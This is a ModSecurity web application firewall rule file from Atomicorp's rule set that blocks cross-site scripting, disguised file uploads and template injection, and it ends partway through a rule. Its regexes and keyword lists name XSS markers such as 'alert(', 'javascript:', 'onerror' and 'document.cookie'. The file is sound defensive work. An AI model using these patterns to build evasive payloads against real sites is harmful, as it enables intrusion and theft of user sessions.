SecRule REQUEST_HEADERS:Content-Disposition "\.(?:php|txt|asp|pl|exe|cgi)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340140,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Bogus graphics file'"

SecRule FILES|FILES_NAMES "\.(?:ph(?:p|tml|t)|txt|asp|pl|exe|cgi|php[0-9])$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340141,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  upload attack - Attempt to upload a non-graphics file as a graphics file blocked'"


SecMarker END_IMAGE_CHECKS

SecRule REQUEST_URI|REQUEST_HEADERS|ARGS "=(?:\(alert\)|alert\(|alert\[)" "phase:1,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:347198,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerability scanner attempting cross site scripting attempt'"

SecRule REQUEST_URI "< ?a ?href ?= ?'? ?javascript" "phase:1,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:347197,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt'"

##############XSS RULES################################
SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|QUERY_STRING|!ARGS:areas|!ARGS:templatecode "@pm self document this top window document cookie" "id:333138,phase:2,t:none,t:removeComments,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:333139,t:none,pass,nolog,noauditlog,skipAfter:END_PRE_XSS_ATTACKS"

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "(?:self|document|this|top|window)\s*\)*(?:\[[^\]]+\]|\.\s*document|\.\s*cookie)" "id:333140,rev:11,severity:2,phase:2,deny,status:403,capture,t:none,t:removeComments,t:urlDecodeUni,msg:'Atomicorp.com WAF Rules: JavaScript global variable found',logdata:'Matched Data: Suspicious JS global variable found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',log,auditlog"

SecMarker END_PRE_XSS_ATTACKS

SecRule REQUEST_URI "^/\?customize_changeset_uuid=" "id:321113,rev:1,phase:2,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:SKIP_AFTER_RULE_333141" 

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:XOTSSOCookie|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/*|!REQUEST_COOKIES:cf_clearance|!REQUEST_COOKIES:/user/|!ARGS:cart_description|!ARGS:/webtag/|!ARGS:/html/|!ARGS:/template/|!ARGS:/js/|!ARGS:/css/|!ARGS:/javascript/|!ARGS:/content/|!ARGS:/custom/|!ARGS:/shortcode/|!REQUEST_COOKIES:/activecollab/|!ARGS:vgo_ee "(?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]+on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" "id:333141,rev:21,severity:2,phase:2,status:403,deny,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,msg:'Atomicorp.com WAF Rules: Potential XSS Attack detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:auditLogParts=+E,log,auditlog"

SecMarker SKIP_AFTER_RULE_333141

SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|QUERY_STRING|!ARGS:areas|!ARGS:templatecode "@pm userpassword alert objectclass mail qss xss embed script expression html onevent onmouse ontouch uid onselect onsubmit onfocus onabort onblur onchange ondragdrop onkey ?= img src onload onerror import asfunction: background-image: fromcharcode frame input lowsrc mocha onblur onchange onclick onkeydown onkeypress onkeyup resize select unload shell: settimeout addimport @import url window.location < > env about applet activex chrome getparentfolder getspecialfolder href object eval img base" "id:333838,phase:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,pass,nolog,noauditlog,skip:1,multimatch"
        SecAction "phase:2,id:334386,t:none,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS"


#Global rule for Qualys' fake XSS tests
SecRule REQUEST_URI|REQUEST_HEADERS|ARGS "(?:<|\(|\{)qx?ss" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:lowercase,t:removeComments,t:removeWhitespace,multimatch,id:347099,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerability scanner attempting cross site scripting attempt'"

SecRule REQUEST_URI|REQUEST_HEADERS|ARGS "=\(alert\)\(" "phase:2,deny,log,auditlog,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:lowercase,t:removeComments,t:removeWhitespace,multimatch,id:347199,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerability scanner attempting cross site scripting attempt'"


#Global rule for Qualys' fake XSS tests
#SecRule REQUEST_URI|REQUEST_HEADERS|ARGS "\; ?\( ?function ?\( ?\)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:lowercase,t:removeComments,multimatch,id:347098,rev:7,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerability scanner attempting cross site scripting attempt'"

# Rule 340099: cross site scripting attempt IMG onerror or onload
SecRule REQUEST_URI|REQUEST_HEADERS "\< ?(?:img ?/? src ?=|body\b|input\b).{1,100}\bon(?:error|load|focus)\b ?=" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:lowercase,t:compressWhitespace,t:removeComments,id:340099,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt',multimatch"
SecRule REQUEST_URI|REQUEST_HEADERS "\< ?(?:img ?/? src ?=|body\b|input\b).{1,100}\bon(?:error|load|focus)\b ?=" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:compressWhitespace,t:lowercase,id:341099,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt'"

# Rule 340102: cross site scripting attempt STYLE + JSCRIPT
SecRule REQUEST_URI|REQUEST_HEADERS "type ?= ?[\'\"]text\/(?:j|vb|x-vb|ecma|java|x-java)script" "chain,phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,id:340102,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt'"
SecRule REQUEST_URI "!(/(?:scripts|staff)/index\.php\?(?:action|_m)=)"

# Rule 340106: cross site scripting attempt STYLE + EXPRESSION
SecRule REQUEST_URI|REQUEST_HEADERS "style ?= ?[\'\"]? ?x:expression ?\(" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,id:340106,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt STYLE + EXPRESSION'"

# Rule 340109: cross site scripting attempt using XML
SecRule REQUEST_URI|REQUEST_HEADERS "\[ ?cdata ?\[<\]\]> ?script" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,id:340109,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt using XML'"

# Rule 340110: cross site scripting attempt executing hidden Javascript
SecRule REQUEST_URI|REQUEST_HEADERS "(?:eval[\s]*\([\s]*[^\.]\.innerhtml[\s]*\)|window\.execscript[\s]*\()" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,id:340110,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt executing hidden Javascript'"

# Rule 340112: cross site scripting attempt to execute Javascript code
SecRule REQUEST_URI|REQUEST_HEADERS "(?:(?:(?:url|src|href|lowsrc)[\s]*=)|(?:url[\s]*[\(]))[\s]*[\'\"]*javascript[\:]" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,id:340112,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt to execute Javascript code'"

# Rule 340003: XSS insertion into headers
SecRule REQUEST_HEADERS|REQUEST_URI "(?:<[[:space:]]*(?:script|about|applet|activex|chrome)|\bon(?:abort|blur|change|click|event|submit|dragdrop|focus|keydown|keypress|keyup|mouse(?:down|move|out|over|up))\b ?= ?(\"|\')? ?\w|<( |\+)?img( |\+)?src( |\+)?=)"  "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,chain,id:340003,rev:10,severity:2,msg:'Atomicorp.com WAF Rules: XSS attack in request headers'"
SecRule REQUEST_URI "!(modules/tinytinymce/tinymce/jscripts/tiny_mce/utils/validate\.js$)"  "chain,t:none,t:lowercase"
SecRule REQUEST_HEADERS:Referer "!(clientscript/yui/connection/javascript\:false$)" "t:none,t:lowercase"

Secrule REQUEST_URI "(?:^/eprocservice/supplierinboundservice|^/[a-z0-9/]+?\?fl_builder)" "phase:2,id:345358,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_XSS_SPECIAL_2"

# Rule 340211: stealth VBscript injection
SecRule REQUEST_URI|ARGS "(?i:(((url|src|href|lowsrc)[\s]*=)|(url[\s]*[\(]))[\s]*['\x22]*[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*b[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:])" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:normalisePathWin,t:lowercase,chain,id:340211,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting stealth attempt to access shell',logdata:'%{TX.0}'"
SecRule REQUEST_URI "!(?:\/(?:index\.php\?(?:(?:module=blocks&type=admin&func=updat|eid=tx_cms_showpic&fil)e)|node\/[0-9]+\/(?:webform\/components\/|edit))|/(?:node/add/|admin/page/edit))" "t:none,t:lowercase"

#Rule 341211
#Jsencoded window eval
SecRule REQUEST_URI|ARGS "(?:window ?\[ ?\' ?eval|\( ?\|? ?(?:mail|uid|userpassword|objectclass) ?= ?\* ?\))" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,id:341211,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: potentially untrusted encoded javascript detected',logdata:'%{TX.0}'"

SecRule REQUEST_URI|ARGS "ontouch(?:move|end|start)=" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,multimatch,id:341217,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: potentially untrusted encoded javascript detected',logdata:'%{TX.0}'"

# Rule 340210: cross site scripting stealth attempt to access shell
SecRule REQUEST_URI|ARGS "(?i:(((url|src|href|lowsrc)[\s]*=)|(url[\s]*[\(]))[\s]*['\x22]*[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*h[\x09\x0a\x0b\x0c\x0d]*e[\x09\x0a\x0b\x0c\x0d]*l[\x09\x0a\x0b\x0c\x0d]*l[\x09\x0a\x0b\x0c\x0d]*[\:])" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,t:lowercase,chain,id:340210,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting stealth attempt to access shell',logdata:'%{TX.0}'"
SecRule REQUEST_URI "!(?:\/(?:index\.php\?(?:(?:module=blocks&type=admin&func=updat|eid=tx_cms_showpic&fil)e))|/(?:node/add/|admin/page/edit)|node\/[0-9]+\/(?:webform\/components\/|edit|add))" "t:none,t:lowercase"

SecMarker END_XSS_SPECIAL_2

SecRule SERVER_PORT "^844[3-5]$" "id:333839,phase:2,t:none,pass,nolog,noauditlog,skipAfter:END_PLESK1"

SecRule REQUEST_URI "(?:\/(?:index\.php\?(?:(?:module=blocks&type=admin&func=updat|eid=tx_cms_showpic&fil)e))|/(?:node/add/|admin/page/edit)|\?tab=admin|/admin_2s/|^/ndxz-?studio/|node\/[0-9]+\/(?:webform\/components\/|edit|add)|/mail/composemessage|/filemanager/filemanager\.php|/html/scripts/index\.php\?ukey|^/upload/js|^/admin\.php\?templates|/typo3conf/ext/t3quixplorer/|^/eprocservice/supplierinboundservice|^/services/ajax\.php/imp/sendmessage|^/sogo/|^/smb/file-manager/code-editor)|^/\?et_pb_preview=" "id:357839,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_PLESK1"

# Rule 340113 341211: cross site scripting stealth attempt to execute Javascript code
SecRule ARGS|!ARGS:/^dnn/|!ARGS:html|!ARGS:/analitic/|!ARGS:/analytic/|!ARGS:ta|!ARGS:/wpcf7/|!ARGS:/htmlcode/|!ARGS:areas|!ARGS:templatecode|!ARGS:code|!ARGS:/^jform/|!ARGS:/content/|!ARGS:/tpl/|!ARGS:/header/|!ARGS:/rawcode/|!ARGS:/^tv/|!ARGS:/footer/|!ARGS:livezillacode|!ARGS:/script/|!ARGS:p_posts_va|!ARGS:description_short_1|!ARGS:senddescription|!ARGS:widget_code|!ARGS:/fckeditor/|!ARGS:emailmessage|!ARGS:wrap|!ARGS:/template/|!ARGS:cid|!ARGS:form_confirmation_message "(?i:(((url|src|href|lowsrc)[\s]*=)|(url[\s]*[\(]))[\s]*['\x22]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:])" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,t:lowercase,capture,id:340113,rev:36,severity:2,msg:'Atomicorp.com WAF Rules: Potential attempt to inject javascript ',logdata:'%{TX.0},%{matched_var_name}'"

SecMarker END_PLESK1
# Rule 340020:
#XSS in referrer and UA headers
#SecRule REQUEST_HEADERS:REFERER|REQUEST_HEADERS:User-Agent "(?:<[[:space:]]*(?:script|about|applet|activex|chrome)|activexobject|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parent|special)folder|< ?iframe |\.innerhtml|\<input|lowsrc|mocha\:|\bon(?:abort|blur|change|click|submit|dragdrop|focus|key(?:down|press|up)|mouse(?:down|move|out|over|up)|resize|select|unload)\b ?=|settimeout|shell\:|\b(?:vb|java|j|live)script(?: ?>|\")|>(?: |\+)?<(?: |\+)?img(?: |\+)?src(?: |\+)?=(?: |\+)?(?:ht|f)tps?:/)"          "phase:2,deny,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,capture,id:340020,rev:34,severity:2,msg:'Atomicorp.com WAF Rules: XSS in referrer and UA headers',chain,logdata:'%{TX.0}'"
#SecRule REQUEST_HEADERS:REFERER "!(^http://%{SERVER_NAME}/|pagead[0-9]\.googlesyndication\.com/pagead/|/gills\.swf?txt=<a href= ?asfunction:_root\.launchurl|vbscript.*convert.*&hl=.*client=|convert.*vbscript.*search|\?_rw=http|/tinymce/jscripts/|/pageear_[a-z]\.swf|/search\?hl=.*q=.*(?:vb|java)script)" "chain,t:none,t:lowercase"
#SecRule REQUEST_HEADERS:REFERER|REQUEST_URI "!(/plugins/editors/tinymce/jscripts/|/modules/tinymce/tinymce/jscripts|/phpinfo_iframe\.php|/tinymce/jscripts/|swf/pageear_[a-z]\.swf\?|!(/vbscript/|power script))" "t:none,t:lowercase"

#special case for drupal for 340147 above
SecRule REQUEST_URI "node/[0-9]+/webform/components/" "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:lowercase,capture,id:320474,rev:14,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',logdata:'%{TX.0}'"
SecRule REQUEST_URI|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS|ARGS_NAMES|!ARGS:/^dbem/|!ARGS:/suffix/|!ARGS:areas|!ARGS:templatecode|!ARGS:optional_head|!ARGS:/^extra/|!ARGS:op|!ARGS:file|!ARGS:notice|!ARGS:/formcode/|!ARGS:/tracking/|!ARGS:/jscode/|!ARGS:video1|!ARGS:paragrafo|!ARGS:value[value]|!ARGS:sidebar|!ARGS:/statement/|!ARGS:text1|!ARGS:offertext|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:/header/|!ARGS:/desc/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:eventDescription|!ARGS:match_report|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:diz|!ARGS:/custom_code/|!ARGS:project_company|!ARGS:antwoord|!ARGS:project_company|!ARGS:value|!ARGS:/^fck/|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "((?:<|/) ?(?:(?:java|vb)?script|about|applet|activex|chrome)|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<|> ?\"? ?(>|<)|< ?/?i?frame|\%env)""t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhiteSpace,t:lowercase"


#XSS generic filter and suspicious web code detector
SecRule REQUEST_URI "!(?:/(?:admin/(?:(?:build(?:/translate|language/edit|/edit)?|catalog_category)/|settings/site-information|catalog/edit)|(?:miadmin/catalog_product|sitebuilder)/|wizard/edit/html|node/add/|filter-xss|(?:p(?:age_save|roduct_groups/edit/)|[a-z]+/[0-9]+/edit))|\/(?:admin\/(?:surveys\/[0-9]+\/edit\/|\?page=spageedit)|node\/[0-9]+\/(?:webform\/components\/|edit|clone))|^(?:(/~[a-z0-9]+)?/\?q=node/[0-9]+/edit|\?(?:s|v))|c=myaccount&m=update_profile$|mt\.cgi|/nav\.php\?nav=addnews|/products\.php\?action=(?:edit|update)|/systemadmin/configproducts\.php|/admin/catalog_product/|/index\.php\?tab=admincatalog|/admin/settings/customerror|^/ndxz-?studio/\?a=|/editform\?|/wizard/edit/|\?tab=admin|\?content=admin|\?action=modif|\?exec=articles_edit$|/admin/preview\.php|/sysext/tstemplate/|/site-builder/|/(?:new|edit)/[0-9]+/(?:confirm|add)|/admin/editform|/cms/admin/editform|^/filemanager/filemanager\.php|^/([a-z]+/)?admin/structure/|^/support/agent/|^/content/item/edit/|^/index\.php/admin/system_config/|^/administrator/\?option=com_civicrm|^/za/zcadm|^/blog/roller-ui/authoring/entryedit|^/admin/(?:p(?:age_save|roduct_groups/edit/)|[a-z]+/[0-9]+/(?:edit|add))|^/em/admin/\?page=send|^/eprocservice/supplierinboundservice|^/cp/index\.php\?controller=adminmodules|^/services?/bmwidget\.json|^/[a-z0-9/]+?\?fl_builder)" "id:333840,phase:2,t:none,t:lowercase,t:urlDecodeUni,pass,nolog,noauditlog,skip:1,rev:7"
        SecAction "phase:2,id:334387,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D1"

#Filenames
SecRule REQUEST_FILENAME "!(/file-manager/edit/)" "id:366840,phase:2,t:none,t:lowercase,t:urlDecodeUni,pass,nolog,noauditlog,skip:1,rev:2"
        SecAction "phase:2,id:336687,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D1"

SecRule REQUEST_URI "(?:^/[a-z0-9/]+?panels/ajax/editor/edit-pane/panelizer|^/[a-z]+/media/ajax/image|^/admin/[a-z]+/(?:[0-9]+|create)|^/file/ajax/|^/manage/[a-z0-9]+/edit/|^/smb/file-manager/code-editor/|^/index\.php\?route=extension/d_quickcheckout/[a-z0-9]+/update|^/[a-z0-9]+?/?admin[a-z0-9]+?/index\.php\?controller=admin|^/wp-admin/edit\.php\?post_type=event&page=events-manager-options)" "id:366870,phase:2,t:none,t:lowercase,t:urlDecodeUni,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D1"

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|!ARGS:text|!ARGS:settings|!ARGS:post "@rx {{.*?}}" "id:340130,rev:5,phase:2,deny,status:403,log,auditlog,capture,t:none,msg:'Atomicorp.com WAF Rules: AngularJS client side template injection detected',logdata:'Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}', tag:'attack-xss',ctl:auditLogParts=+E,severity:'CRITICAL'"

SecRule REQUEST_URI "^/index\.php\?ajax-proxy/" "id:321114,rev:1,phase:2,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS" 

# Rule 340147: Generic XSS filter
SecRule REQUEST_URI|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS|!ARGS:input_65|!ARGS:/^cont/|!ARGS:/introtext/|!ARGS:_message|!ARGS:/com_liferay/|!ARGS:/fbmcc/|!ARGS:/ide_/|ARGS_NAMES|!ARGS:/^aftax/|!ARGS:/bsr_/|!ARGS:nav-menu-data|!ARGS:/contact_map/|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:/go_code/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:eingabe|!ARGS:ausgabe|!ARGS:/previewdata/|!ARGS:/tracking_extra/|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/field_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:/^texte$/|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/^instance/|!ARGS:/customfield/|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/keycaptcha_code/|!ARGS:/jscode/|!ARGS:postcontents|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:tracking_code|!ARGS:whats-new|!ARGS:analyticscode|!ARGS:top_news|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/script/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:match_report|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:/signature/|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofie